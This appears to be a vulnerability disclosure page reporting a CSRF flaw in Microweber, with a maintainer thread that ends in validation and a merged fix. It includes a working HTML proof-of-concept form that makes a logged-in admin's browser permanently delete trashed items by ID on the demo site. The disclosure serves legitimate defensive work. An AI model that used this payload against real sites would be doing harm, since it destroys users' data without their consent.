Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Aug 9th 2021


✍️ Description

Attacker able to delete all file forever from trash if knows the id parameter value of all files that exist in trash with CSRF attack.

🕵️‍♂️ Proof of Concept

Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the file with 18 and 19 and 20 ids have been deleted.

//PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
<input type="hidden" name="ids&#91;&#93;" value="18" />
<input type="hidden" name="ids&#91;&#93;" value="19" />
<input type="hidden" name="ids&#91;&#93;" value="20" />
<input type="hidden" name="forever" value="true" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

All files on trash will be deleted forever. 📍 Location app.js#L1

Occurences

We have contacted a member of the microweber team and are waiting to hear back 4 months ago
microweber/microweber maintainer has invalidated this vulnerability 4 months ago

This issue need the user to be logged as admin

The disclosure bounty has been dropped
The fix bounty has been dropped
amammad
4 months ago

Researcher


Yah the main action of any CSRF attack is that users must be logged in before, excuse me for my bad explanation but this is CSRF and already assigned a CWE to it.

amammad
4 months ago

Researcher


CSRF attacks means at the first user/admin should be logged into your application and then just going to a malicious website and after that only with visiting a site attacker can delete a batch of users.

amammad
4 months ago

Researcher


You can set Strict value on SameSite attribute of just one of your cookies and then anybody won't able to perform any CSRF attacks.

amammad
4 months ago

Researcher


@admin can you change the status of this report like before?

Jamie Slome
4 months ago

Admin


@amammad - I have updated the status of the report.

@maintainer - feel free to mark as valid if you see fit.

Peter Ivanov validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov
4 months ago

Maintainer


Thanks we will fix it and provide update soon

amammad
4 months ago

Researcher


Yah, your welcome dear peter. can you validate the other CSRFs too?

amammad modified their report
4 months ago
amammad
4 months ago

Researcher


@admin Hey man, I make a foolish mistake and report a vulnerabity with wrong title.

can you change the title to CSRF? with regards .

Jamie Slome
4 months ago

Admin


@amammad - sorted!

Peter Ivanov confirmed that a fix has been merged on 8a577f 4 months ago
Peter Ivanov has been awarded the fix bounty